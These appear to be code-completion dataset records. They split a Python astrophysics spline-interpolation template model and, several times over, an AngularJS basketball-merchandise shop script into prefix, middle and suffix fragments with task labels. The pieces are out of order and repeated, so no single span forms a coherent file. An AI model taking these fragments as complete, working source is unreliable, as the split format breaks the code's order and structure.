class RectBivariateSplineWrapper(object):
"""
Wrapper around RectBivariateSpline, which supplies a __call__ method that accepts the same
syntax as the other interpolation methods
"""
def __init__(self, *args, **kwargs):
# We use scipy's RectBivariateSpline, which provides spline interpolation instead of linear interpolation
self._interpolator = scipy.interpolate.RectBivariateSpline(*args, **kwargs)
def __call__(self, x):
res = self._interpolator(*x)
return res[0][0]
class TemplateModel(Function1D):
r"""
description :
A template model
latex : $n.a.$
parameters :
K :
desc : Normalization (freeze this to 1 if the template provides the normalization by itself)
initial value : 1.0
scale :
desc : Scale for the independent variable. The templates are handled as if they contain the fluxes
at x / scale. This is useful for example when the template describes energies in the rest frame,
at which point the scale describes the transformation between rest frame energy and observer frame
energy. Fix this to 1 to neutralize its effect.
initial value : 1.0
min : 1e-5
"""
__metaclass__ = FunctionMeta
def _custom_init_(self, model_name):
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % model_name))
if not os.path.exists(filename_sanitized):
raise MissingDataFile("The data file %s does not exists. Did you use the "
"TemplateFactory?" % (filename_sanitized))
# Open the template definition and read from it
self._data_file = filename_sanitized
with HDFStore(filename_sanitized) as store:
self._data_frame = store['data_frame']
self._parameters_grids = collections.OrderedDict()
processed_parameters = 0
for key in store.keys():
match = re.search('p_([0-9]+)_(.+)', key)
if match is None:
continue
else:
tokens = match.groups()
this_parameter_number = int(tokens[0])
this_parameter_name = str(tokens[1])
assert this_parameter_number == processed_parameters, "Parameters out of order!"
self._parameters_grids[this_parameter_name] = store[key]
processed_parameters += 1
self._energies = store['energies']
# Now get the metadata
metadata = store.get_storer('data_frame').attrs.metadata
description = metadata['description']
name = metadata['name']
self._interpolation_degree = metadata['interpolation_degree']
self._spline_smoothing_factor = metadata['spline_smoothing_factor']
| function_definition['description'] = description
function_definition['latex'] = 'n.a.'
# Now build the parameters according to the content of the parameter grid
parameters = collections.OrderedDict()
parameters['K'] = Parameter('K', 1.0)
parameters['scale'] = Parameter('scale', 1.0)
for parameter_name in self._parameters_grids.keys():
grid = self._parameters_grids[parameter_name]
parameters[parameter_name] = Parameter(parameter_name, grid.median(),
min_value=grid.min(),
max_value=grid.max())
super(TemplateModel, self).__init__(name, function_definition, parameters)
self._prepare_interpolators()
# Now substitute the evaluate function with a version with all the required parameters
# Get the parameters' names (except for K and scale)
par_names_no_K_no_scale = parameters.keys()[2:]
function_code = 'def new_evaluate(self, x, %s): ' \
'return K * self._interpolate(x, scale, [%s])' % (",".join(parameters.keys()),
",".join(par_names_no_K_no_scale))
exec(function_code)
add_method(self, new_evaluate,'_evaluate')
self.evaluate = self._evaluate
def _prepare_interpolators(self):
# Figure out the shape of the data matrices
data_shape = map(lambda x: x.shape[0], self._parameters_grids.values())
self._interpolators = []
for energy in self._energies:
# Make interpolator for this energy
# NOTE: we interpolate on the logarithm
this_data = np.array(np.log10(self._data_frame[energy].values).reshape(*data_shape), dtype=float)
if len(self._parameters_grids.values()) == 2:
x, y = self._parameters_grids.values()
# Make sure that the requested polynomial degree is less than the number of data sets in
# both directions
msg = "You cannot use an interpolation degree of %s if you don't provide at least %s points " \
"in the %s direction. Increase the number of templates or decrease the interpolation " \
"degree."
if len(x) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree+1, 'x'))
if len(y) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree + 1, 'y'))
this_interpolator = RectBivariateSplineWrapper(x, y, this_data,
kx=self._interpolation_degree,
ky=self._interpolation_degree,
s=self._spline_smoothing_factor)
else:
# In more than 2d we can only use linear interpolation
this_interpolator = scipy.interpolate.RegularGridInterpolator(self._parameters_grids.values(),
this_data)
self._interpolators.append(this_interpolator)
def _set_units(self, x_unit, y_unit):
self.K.unit = y_unit
self.scale.unit = 1 / x_unit
# This function will be substituted during construction by another version with
# all the parameters of this template
def evaluate(self, x, K, scale):
# This is overridden in the constructor
raise NotImplementedError("Should not get here!")
def _interpolate(self, energies, scale, parameters_values):
if isinstance(energies, u.Quantity):
# Templates are always saved with energy in keV. We need to transform it to
# a dimensionless quantity (actually we take the .value property) because otherwise
# the logarithm below will fail.
energies = np.array(energies.to('keV').value, ndmin=1, copy=False, dtype=float)
# Same for the scale
scale = scale.to(1 / u.keV).value
log_energies = np.log10(energies)
e_tilde = self._energies * scale
# Gather all interpolations for these parameters' values at all defined energies
# (these are the logarithm of the values)
log_interpolations = np.array(map(lambda i:self._interpolators[i](parameters_values),
range(self._energies.shape[0])))
# Now interpolate the interpolations to get the flux at the requested energies
# NOTE: the variable "interpolations" contains already the log10 of the values,
interpolator = scipy.interpolate.InterpolatedUnivariateSpline(np.log10(e_tilde),
log_interpolations,
k=self._interpolation_degree,
ext=0)
values = np.power(10, interpolator(log_energies))
# The division by scale results from the differential:
# E = e * scale
# de = dE / scale
# dN / dE = dN / de * de / dE = dN / de * (1 / scale)
# NOTE: the units are added back through the multiplication by K in the evaluate method
return values / scale
def to_dict(self, minimal=False):
data = super(Function1D, self).to_dict(minimal)
if not minimal:
data['extra_setup'] = {'data_file': self._data_file}
return data | # Make the dictionary of parameters
function_definition = collections.OrderedDict()
| random_line_split |
index.js | /**
* Created by bjwsl-001 on 2016/11/9.
*/
var app=angular.module("NBA",['ng','ngRoute']);
// Set the default request headers for POST requests
app.run(function($http){
$http.defaults.headers.post={"Content-Type":"application/x-www-form-urlencoded"};
})
// Set up the root controller
app.controller("rootCtrl",["$scope","$rootScope","$location","$routeParams","$http",function($scope,$rootScope,$location,$routeParams,$http){
// check the screen width first when navigating to this route;
$rootScope.userId=1;// holds the user id;
$rootScope.userName="lijun";// user name; remove once the remaining features are finished
$rootScope.pclass="";// product category for queries;
$rootScope.searchMsg={};// query info
$rootScope.searchMsg.pageNum=1;
$rootScope.num=[];// array of page numbers
$rootScope.len=8;// records per page
$rootScope.proList=[];// holds the product list data
$rootScope.isMore=true;// whether there is a next page
$rootScope.isPrev=false;// whether there is a previous page
$rootScope.exit=function(){
$rootScope.userId="";
$rootScope.userName="";
}
$rootScope.jump=function(url){
$location.path(url);
}
$rootScope.$watch("searchMsg.pageNum",function(){
// update the state of the pagination buttons
$rootScope.isPrev=$rootScope.searchMsg.pageNum>1?true:false;
$rootScope.isMore=$rootScope.searchMsg.pageNum>=$rootScope.pageCount?false:true;
})
$rootScope.loadMore=function(n,url) {
// receive the page number to load
$rootScope.searchMsg.pageNum=n;
$http.get(url+"?"+$.param($rootScope.searchMsg)).success(function (obj) {
$rootScope.pageCount=obj.pageCount;
$rootScope.len = obj.data.length;
if (innerWidth > 450) {// when the viewport is wider than a phone, clear the list so products load page by page
$rootScope.proList = [];
$rootScope.num=[];
for(var i=1;i<=obj.pageCount;i++){
$rootScope.num.push(i);
$rootScope.isPageShow=true;
}
}else{
$rootScope.isPageShow=false;
if($rootScope.len<8){
$rootScope.searchMsg.pageNum++;
}
}
for (var i = 0; i < $rootScope.len; i++) {
var img=obj.data[i].img_sm;
obj.data[i].img_sm=img.slice(0,img.length-9)+"sm.jpg";
$rootScope.proList.push(obj.data[i]);
}
});
};
$rootScope.goToUserCenter=function(){
if($rootScope.userName){
$location.path('/mall_userCenter/1');
}else{
//TODO show a prompt dialog;
alert("请登录");
}
}
}]);
// Configure the routes
app.config(function($routeProvider){
$routeProvider
.when("/APP_start",{
templateUrl:"tpl/APP_start.html"
})
.when("/mall_main",{
templateUrl:"tpl/mall_main.html",
controller:"mallMainCtrl"
})
.when("/mall_search/:id",{
templateUrl:"tpl/mall_search.html",
controller:"mallSearchCtrl"
})
.when("/mall_proList/:id",{
templateUrl:"tpl/mall_proList.html",
controller:"mallProListCtrl"
})
.when("/mall_proListbyteam/:id",{
templateUrl:"tpl/mall_proListbyteam.html",
controller:"mallProListByTeamCtrl"
})
.when("/mall_detail/:id",{
templateUrl:"tpl/mall_detail.html",
controller:"mallDetailCtrl"
})
.when("/mall_lottery",{
templateUrl:"tpl/mall_lottery.html",
controller:"mallLotteryCtrl"
})
.when("/mall_userCenter/:id",{
templateUrl:"tpl/mall_userCenter.html",
controller:"mallUserCenterCtrl"
})
.otherwise({redirectTo:"/APP_start"})
});
app.controller("mallMainCtrl",["$scope",function($scope){
}]);
app.controller("mallDetailCtrl",["$scope","$routeParams","$http","$rootScope",function($scope,$routeParams,$http,$rootScope){
// Read the parameter passed by the route and request the product details from the server
$scope.order={}
$http.get("data/7_showProductDetails.php?proId="+$routeParams.id).success(function(obj){
$scope.proDetail=obj;
$scope.order.count=1;
$scope.order.proId=$routeParams.id;
$scope.colorList=obj.colorList;
$scope.order.colorId=$scope.colorList[0].colorId;// color id;
$scope.photoList=$scope.colorList[0].photoList;// photo list for this color
$scope.sizeList=$scope.colorList[0].sizeList;// size list for this color
$scope.Img={};
$scope.Img.s=$scope.colorList[0].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.order.sizeId=$scope.colorList[0].sizeList[0].sizeId;
// product details array
$scope.pinfo=obj.pinfo.split("_");
$scope.$watch("Img.s",function(){
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
})
$scope.$watch("order.colorId",function(){
for(var i=0;i<$scope.colorList.length;i++){
if($scope.order.colorId==$scope.colorList[i].colorId){
$scope.photoList=$scope.colorList[i].photoList;
$scope.Img.s=$scope.colorList[i].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.sizeList=$scope.colorList[i].sizeList;
$scope.order.sizeId=$scope.colorList[i].sizeList[0].sizeId;
}
}
})
})
$scope.reduce=function(){
if($scope.order.count>1){
$scope.order.count--;
}
}
$scope.add=function(){
$scope.order.count++;
}
// Add to cart
$scope.addToCart=function(){
if($rootScope.userName){
$scope.order.uname=$rootScope.userName;
// send the request to submit the data
if($scope.order.proId!==undefined
&& $scope.order.count!==undefined
&& $scope.order.colorId!==undefined
&& $scope.order.sizeId!==undefined){
$http.post("data/8_cartAdd.php", $.param($scope.order)).success(function(txt){
if(txt=="ok"){
alert("商品添加购物车成功,您可以去到我的购物车进行结算")
| "$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.isPageShow=innerWidth>450?true:false;
$rootScope.searchMsg={};
$rootScope.searchMsg.pclass=$routeParams.id;
$rootScope.num=[];
$rootScope.proList=[];
$rootScope.loadMore(1,"data/5_showProductByPclass.php");
$scope.show=function(n){
$rootScope.loadMore(n+1,"data/5_showProductByPclass.php");
}
$scope.showNext=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.prev=function(){
$rootScope.searchMsg.pageNum--;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.add=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
}]);
app.controller("mallProListByTeamCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.team=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/6_showProductByTeam.php");
}]);
app.controller("mallUserCenterCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
if($routeParams.id==1){
$scope.isMyCart=true;
$scope.isMyOrder=false;
$http.get("data/9_cartShow.php?uname="+$rootScope.userName).success(function(data){
$scope.productList=data;
for(var i= 0,sum=0;i<$scope.productList.length;i++){
var total=($scope.productList[i].price*$scope.productList[i].count).toFixed(2);
$scope.productList[i].totalPrice=total;
sum+=Number(total);
}
$scope.total=sum;
})
$scope.removePro=function(did){
$scope.did=did;
$http.get("data/10_cartRemove.php?did="+did).success(function(txt){
if(txt=="ok"){
for(var i=0;i<$scope.productList.length;i++){
if($scope.productList[i].did==$scope.did){
$scope.total-=$scope.productList[i].totalPrice;
$scope.productList.splice(i,1);
break;
}
}
}else{
alert("删除失败了")
}
})
}
$scope.submitOrder=function(){
$scope.data={};
$scope.data.rcvId=1;
$scope.data.price=$scope.total;
$scope.data.payment=1;
$scope.data.uname=$rootScope.userName;
$scope.data.productList=JSON.stringify($scope.productList);
$http.post("data/11_addOrder.php", $.param($scope.data)).success(function(data){
if(data.msg=="succ"){
alert("订单提交成功,您的订单编号为"+data.orderNum+"; 您可以在我的订单中查看订单状态");
$scope.productList=[];
$scope.total=0;
}else{
alert("订单提交失败");
}
})
}
}else{
$scope.isMyCart=false;
$scope.isMyOrder=true;
$scope.orderList=null;
$http.get("data/12_showOrder.php?uname="+$rootScope.userName).success(function(data){
$scope.orderList=data;
for(var i=0;i<$scope.orderList.length;i++){
var date=new Date(Number($scope.orderList[i].orderTime));
$scope.orderList[i].orderTime=$scope.changeTime(date);
var status=$scope.orderList[i].status;
$scope.orderList[i].status=$scope.judgeStatus(status);
}
})
// convert the date to a display format
$scope.changeTime=function(date){
var year=date.getFullYear();
var mouth=date.getMonth()+1;// getMonth() is zero-based, so add 1 for display
mouth=mouth<10?("0"+mouth):mouth;
var day=date.getDate();
day=day<10?("0"+day):day;
var hour=date.getHours();
hour=hour<10?("0"+hour):hour;
var minues=date.getMinutes();
minues=minues<10?("0"+minues):minues;
var second=date.getSeconds();
second=second<10?("0"+second):second;
return year+'-'+mouth+'-'+day+'\n'+hour+":"+minues+":"+second;
}
// map the order status code to a label
$scope.judgeStatus=function(status){
switch(status){
case "1":
return "等待付款";
break;
case "2":
return "等待配货";
break;
case "3":
return "运输中";
break;
case "4":
return "已收货";
break;
}
}
}
}]);
function chose(obj){
$(obj).addClass("color-box-active").parent().siblings("label").children(".color-box-active").removeClass("color-box-active");
}
| }else{
alert("添加失败")
}
})
}
}else{
//TODO show a prompt reminding the user to log in
alert("您还未登录,请登录后在使用此功能")
}
}
}]);
app.controller("mallLotteryCtrl",["$scope",function($scope){
}]);
app.controller("mallSearchCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.kw=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/4_showProductByKw.php");
}]);
app.controller("mallProListCtrl",["$scope", | conditional_block |
index.js | /**
* Created by bjwsl-001 on 2016/11/9.
*/
var app=angular.module("NBA",['ng','ngRoute']);
// Set the default request headers for POST requests
app.run(function($http){
$http.defaults.headers.post={"Content-Type":"application/x-www-form-urlencoded"};
})
// Set up the root controller
app.controller("rootCtrl",["$scope","$rootScope","$location","$routeParams","$http",function($scope,$rootScope,$location,$routeParams,$http){
// check the screen width first when navigating to this route;
$rootScope.userId=1;// holds the user id;
$rootScope.userName="lijun";// user name; remove once the remaining features are finished
$rootScope.pclass="";// product category for queries;
$rootScope.searchMsg={};// query info
$rootScope.searchMsg.pageNum=1;
$rootScope.num=[];// array of page numbers
$rootScope.len=8;// records per page
$rootScope.proList=[];// holds the product list data
$rootScope.isMore=true;// whether there is a next page
$rootScope.isPrev=false;// whether there is a previous page
$rootScope.exit=function(){
$rootScope.userId="";
$rootScope.userName="";
}
$rootScope.jump=function(url){
$location.path(url);
}
$rootScope.$watch("searchMsg.pageNum",function(){
// update the state of the pagination buttons
$rootScope.isPrev=$rootScope.searchMsg.pageNum>1?true:false;
$rootScope.isMore=$rootScope.searchMsg.pageNum>=$rootScope.pageCount?false:true;
})
$rootScope.loadMore=function(n,url) {
// receive the page number to load
$rootScope.searchMsg.pageNum=n;
$http.get(url+"?"+$.param($rootScope.searchMsg)).success(function (obj) {
$rootScope.pageCount=obj.pageCount;
$rootScope.len = obj.data.length;
if (innerWidth > 450) {// when the viewport is wider than a phone, clear the list so products load page by page
$rootScope.proList = [];
$rootScope.num=[];
for(var i=1;i<=obj.pageCount;i++){
$rootScope.num.push(i);
$rootScope.isPageShow=true;
}
}else{
$rootScope.isPageShow=false;
if($rootScope.len<8){
$rootScope.searchMsg.pageNum++;
}
}
for (var i = 0; i < $rootScope.len; i++) {
var img=obj.data[i].img_sm;
obj.data[i].img_sm=img.slice(0,img.length-9)+"sm.jpg";
$rootScope.proList.push(obj.data[i]);
}
});
};
$rootScope.goToUserCenter=function(){
if($rootScope.userName){
$location.path('/mall_userCenter/1');
}else{
//TODO show a prompt dialog;
alert("请登录");
}
}
}]);
// Configure the routes
app.config(function($routeProvider){
$routeProvider
.when("/APP_start",{
templateUrl:"tpl/APP_start.html"
})
.when("/mall_main",{
templateUrl:"tpl/mall_main.html",
controller:"mallMainCtrl"
})
.when("/mall_search/:id",{
templateUrl:"tpl/mall_search.html",
controller:"mallSearchCtrl"
})
.when("/mall_proList/:id",{
templateUrl:"tpl/mall_proList.html",
controller:"mallProListCtrl"
})
.when("/mall_proListbyteam/:id",{
templateUrl:"tpl/mall_proListbyteam.html",
controller:"mallProListByTeamCtrl"
})
.when("/mall_detail/:id",{
templateUrl:"tpl/mall_detail.html",
controller:"mallDetailCtrl"
})
.when("/mall_lottery",{
templateUrl:"tpl/mall_lottery.html",
controller:"mallLotteryCtrl"
})
.when("/mall_userCenter/:id",{
templateUrl:"tpl/mall_userCenter.html",
controller:"mallUserCenterCtrl"
})
.otherwise({redirectTo:"/APP_start"})
});
app.controller("mallMainCtrl",["$scope",function($scope){
}]);
app.controller("mallDetailCtrl",["$scope","$routeParams","$http","$rootScope",function($scope,$routeParams,$http,$rootScope){
// Read the parameter passed by the route and request the product details from the server
$scope.order={}
$http.get("data/7_showProductDetails.php?proId="+$routeParams.id).success(function(obj){
$scope.proDetail=obj;
$scope.order.count=1;
$scope.order.proId=$routeParams.id;
$scope.colorList=obj.colorList;
$scope.order.colorId=$scope.colorList[0].colorId;// color id;
$scope.photoList=$scope.colorList[0].photoList;// photo list for this color
$scope.sizeList=$scope.colorList[0].sizeList;// size list for this color
$scope.Img={};
$scope.Img.s=$scope.colorList[0].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.order.sizeId=$scope.colorList[0].sizeList[0].sizeId;
// product details array
$scope.pinfo=obj.pinfo.split("_");
$scope.$watch("Img.s",function(){
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
})
$scope.$watch("order.colorId",function(){
for(var i=0;i<$scope.colorList.length;i++){
if($scope.order.colorId==$scope.colorList[i].colorId){
$scope.photoList=$scope.colorList[i].photoList;
$scope.Img.s=$scope.colorList[i].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.sizeList=$scope.colorList[i].sizeList;
$scope.order.sizeId=$scope.colorList[i].sizeList[0].sizeId;
}
}
})
})
$scope.reduce=function(){
if($scope.order.count>1){
$scope.order.count--;
}
}
$scope.add=function(){
$scope.order.count++;
}
// Add to cart
$scope.addToCart=function(){
if($rootScope.userName){
$scope.order.uname=$rootScope.userName;
// send the request to submit the data
if($scope.order.proId!==undefined
&& $scope.order.count!==undefined
&& $scope.order.colorId!==undefined
&& $scope.order.sizeId!==undefined){
$http.post("data/8_cartAdd.php", $.param($scope.order)).success(function(txt){
if(txt=="ok"){
alert("商品添加购物车成功,您可以去到我的购物车进行结算")
}else{
alert("添加失败")
}
})
}
}else{
//TODO show a prompt reminding the user to log in
alert("您还未登录,请登录后在使用此功能")
}
}
}]);
app.controller("mallLotteryCtrl",["$scope",function($scope){
}]);
app.controller("mallSearchCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.kw=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/4_showProductByKw.php");
}]);
app.controller("mallProListCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.isPageShow=innerWidth>450?true:false;
$rootScope.searchMsg={};
$rootScope.searchMsg.pclass=$routeParams.id;
$rootScope.num=[];
$rootScope.proList=[];
$rootScope.loadMore(1,"data/5_showProductByPclass.php");
$scope.show=function(n){
$rootScope.loadMore(n+1,"data/5_showProductByPclass.php");
}
$scope.showNext=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.prev=function(){
$rootScope.searchMsg.pageNum--;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.add=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
}]);
app.controller("mallProListByTeamCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.team=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/6_showProductByTeam.php");
}]);
app.controller("mallUserCenterCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
if($routeParams.id==1){
$scope.isMyCart=true;
$scope.isMyOrder=false;
$http.get("data/9_cartShow.php?uname="+$rootScope.userName).success(function(data){
$scope.productList=data;
for(var i= 0,sum=0;i<$scope.productList.length;i++){
var total=($scope.productList[i].price*$scope.productList[i].count).toFixed(2);
$scope.productList[i].totalPrice=total;
sum+=Number(total);
}
$scope.total=sum;
})
$scope.removePro=function(did){
$scope.did=did;
$http.get("data/10_cartRemove.php?did="+did).success(function(txt){
if(txt=="ok"){
for(var i=0;i<$scope.productList.length;i++){
if($scope.productList[i].did==$scope.did){
$scope.total-=$scope.productList[i].totalPrice;
$scope.productList.splice(i,1);
break;
}
}
}else{
alert("删除失败了")
}
})
}
$scope.submitOrder=function(){
$scope.data={};
$scope.data.rcvId=1;
$scope.data.price=$scope.total;
$scope.data.payment=1;
$scope.data.uname=$rootScope.userName;
$scope.data.productList=JSON.stringify($scope.productList);
$http.post("data/11_addOrder.php", $.param($scope.data)).success(function(data){
if(data.msg=="succ"){
alert("订单提交成功,您的订单编号为"+data.orderNum+"; 您可以在我的订单中查看订单状态");
$scope.productList=[];
$scope.total=0;
}else{
alert("订单提交失败");
}
})
}
}else{
$scope.isMyCart=false;
$scope.isMyOrder=true;
$scope.orderList=null;
$http.get("data/12_showOrder.php?uname="+$rootScope.userName).success(function(data){
$scope.orderList=data;
for(var i=0;i<$scope.orderList.length;i++){
var date=new Date(Number($scope.orderList[i].orderTime));
$scope.orderList[i].orderTime=$scope.changeTime(date);
var status=$scope.orderList[i].status;
$scope.orderList[i].status=$scope.judgeStatus(status);
}
})
// convert the date to a display format
$scope.changeTime=function(date){
var year=date.getFullYear();
var mouth=date.getMonth()+1;// getMonth() is zero-based, so add 1 for display
mouth=mouth<10?("0"+mouth):mouth;
var day=date.getDate();
day=day<10?("0"+day):day;
var hour=date.getHours();
hour=hour<10?("0"+hour):hour;
var minues=date.getMinutes();
minues=minues<10?("0"+minues):minues;
var second=date.getSeconds();
second=second<10?("0"+second):second;
return year+'-'+mouth+'-'+day+'\n'+hour+":"+minues+":"+second;
}
// map the order status code to a label
$scope.judgeStatus=function(status){
switch(status){
case "1":
return "等待付款";
break;
case "2":
return "等待配货";
break;
case "3":
return "运输中";
break;
case "4":
return "已收货";
break;
}
}
}
}]);
function chose(obj){
$(obj).addClass("color-box-active").parent().siblings("label").children(".color-box-active").removeClass("color-box-active");
}
| identifier_body |
||
index.js | /**
* Created by bjwsl-001 on 2016/11/9.
*/
var app=angular.module("NBA",['ng','ngRoute']);
// Set the default request headers for POST requests
app.run(function($http){
$http.defaults.headers.post={"Content-Type":"application/x-www-form-urlencoded"};
})
// Set up the root controller
app.controller("rootCtrl",["$scope","$rootScope","$location","$routeParams","$http",function($scope,$rootScope,$location,$routeParams,$http){
// check the screen width first when navigating to this route;
$rootScope.userId=1;// holds the user id;
$rootScope.userName="lijun";// user name; remove once the remaining features are finished
$rootScope.pclass="";// product category for queries;
$rootScope.searchMsg={};// query info
$rootScope.searchMsg.pageNum=1;
$rootScope.num=[];// array of page numbers
$rootScope.len=8;// records per page
$rootScope.proList=[];// holds the product list data
$rootScope.isMore=true;// whether there is a next page
$rootScope.isPrev=false;// whether there is a previous page
$rootScope.exit=function(){
$rootScope.userId="";
$rootScope.userName="";
}
$rootScope.jump=function(url){
$location.path(url);
}
$rootScope.$watch("searchMsg.pageNum",function(){
// update the state of the pagination buttons
$rootScope.isPrev=$rootScope.searchMsg.pageNum>1?true:false;
$rootScope.isMore=$rootScope.searchMsg.pageNum>=$rootScope.pageCount?false:true;
})
$rootScope.loadMore=function(n,url) {
// receive the page number to load
$rootScope.searchMsg.pageNum=n;
$http.get(url+"?"+$.param($rootScope.searchMsg)).success(function (obj) {
$rootScope.pageCount=obj.pageCount;
$rootScope.len = obj.data.length;
if (innerWidth > 450) {// when the viewport is wider than a phone, clear the list so products load page by page
$rootScope.proList = [];
$rootScope.num=[];
for(var i=1;i<=obj.pageCount;i++){
$rootScope.num.push(i);
$rootScope.isPageShow=true;
}
}else{
$rootScope.isPageShow=false;
if($rootScope.len<8){
$rootScope.searchMsg.pageNum++;
}
}
for (var i = 0; i < $rootScope.len; i++) {
var img=obj.data[i].img_sm;
obj.data[i].img_sm=img.slice(0,img.length-9)+"sm.jpg";
$rootScope.proList.push(obj.data[i]);
}
});
};
$rootScope.goToUserCenter=function(){
if($rootScope.userName){
$location.path('/mall_userCenter/1');
}else{
//TODO show a prompt dialog;
alert("请登录");
}
}
}]);
// Configure the routes
app.config(function($routeProvider){
$routeProvider
.when("/APP_start",{
templateUrl:"tpl/APP_start.html"
})
.when("/mall_main",{
templateUrl:"tpl/mall_main.html",
controller:"mallMainCtrl"
})
.when("/mall_search/:id",{
templateUrl:"tpl/mall_search.html",
controller:"mallSearchCtrl"
})
.when("/mall_proList/:id",{
templateUrl:"tpl/mall_proList.html",
controller:"mallProListCtrl"
})
.when("/mall_proListbyteam/:id",{
templateUrl:"tpl/mall_proListbyteam.html",
controller:"mallProListByTeamCtrl"
})
.when("/mall_detail/:id",{
templateUrl:"tpl/mall_detail.html",
controller:"mallDetailCtrl"
})
.when("/mall_lottery",{
templateUrl:"tpl/mall_lottery.html",
controller:"mallLotteryCtrl"
})
.when("/mall_userCenter/:id",{
templateUrl:"tpl/mall_userCenter.html",
controller:"mallUserCenterCtrl"
})
.otherwise({redirectTo:"/APP_start"})
});
app.controller("mallMainCtrl",["$scope",function($scope){
}]);
app.controller("mallDetailCtrl",["$scope","$routeParams","$http","$rootScope",function($scope,$routeParams,$http,$rootScope){
//接收路由传递的参数,向服务器端请求商品详情
$scope.order={}
$http.get("data/7_showProductDetails.php?proId="+$routeParams.id).success(function(obj){
$scope.proDetail=obj;
$scope.order.count=1;
$scope.order.proId=$routeParams.id;
$scope.colorList=obj.colorList;
$scope.order.colorId=$scope.colorList[0].colorId;//颜色id;
$scope.photoList=$scope.colorList[0].photoList;//颜色对应的图片列表
$scope.sizeList=$scope.colorList[0].sizeList;//颜色对应的尺寸列表
$scope.Img={};
$scope.Img.s=$scope.colorList[0].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.order.sizeId=$scope.colorList[0].sizeList[0].sizeId;
//商品详情数组
$scope.pinfo=obj.pinfo.split("_");
$scope.$watch("Img.s",function(){
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
})
$scope.$watch("order.colorId",function(){
for(var i=0;i<$scope.colorList.length;i++){
if($scope.order.colorId==$scope.colorList[i].colorId){
$scope.photoList=$scope.colorList[i].photoList;
$scope.Img.s=$scope.colorList[i].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.sizeList=$scope.colorList[i].sizeList;
$scope.order.sizeId=$scope.colorList[i].sizeList[0].sizeId;
}
}
})
})
$scope.reduce=function(){
if($scope.order.count>1){
$scope.order.count--;
}
}
$scope.add=function(){
$scope.order.count++;
}
//加入购物车
$scope.addToCart=function(){
if($rootScope.userName){
$scope.order.uname=$rootScope.userName;
//发送请求提交数据
if($scope.order.proId!==undefined
&& $scope.order.count!==undefined
&& $scope.order.colorId!==undefined
&& $scope.order.sizeId!==undefined){
$http.post("data/8_cartAdd.php", $.param($scope.order)).success(function(txt){
if(txt=="ok"){
alert("商品添加购物车成功,您可以去到我的购物车进行结算")
}else{
alert("添加失败")
}
})
}
}else{
//TODO 弹出提示框,提醒用户登录
alert("您还未登录,请登录后在使用此功能")
}
}
}]);
app.controller("mallLotteryCtrl",["$scope",function($scope){
}]);
app.controller("mallSearchCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.kw=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/4_showProductByKw.php");
}]);
app.controller("mallProListCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.isPageShow=innerWidth>450?true:false;
$rootScope.searchMsg={};
$rootScope.searchMsg.pclass=$routeParams.id;
$rootScope.num=[];
$rootScope.proList=[];
$rootScope.loadMore(1,"data/5_showProductByPclass.php");
$scope.show=function(n){
$rootScope.loadMore(n+1,"data/5_showProductByPclass.php");
}
$scope.showNext=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.prev=function(){
$rootScope.searchMsg.pageNum--;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
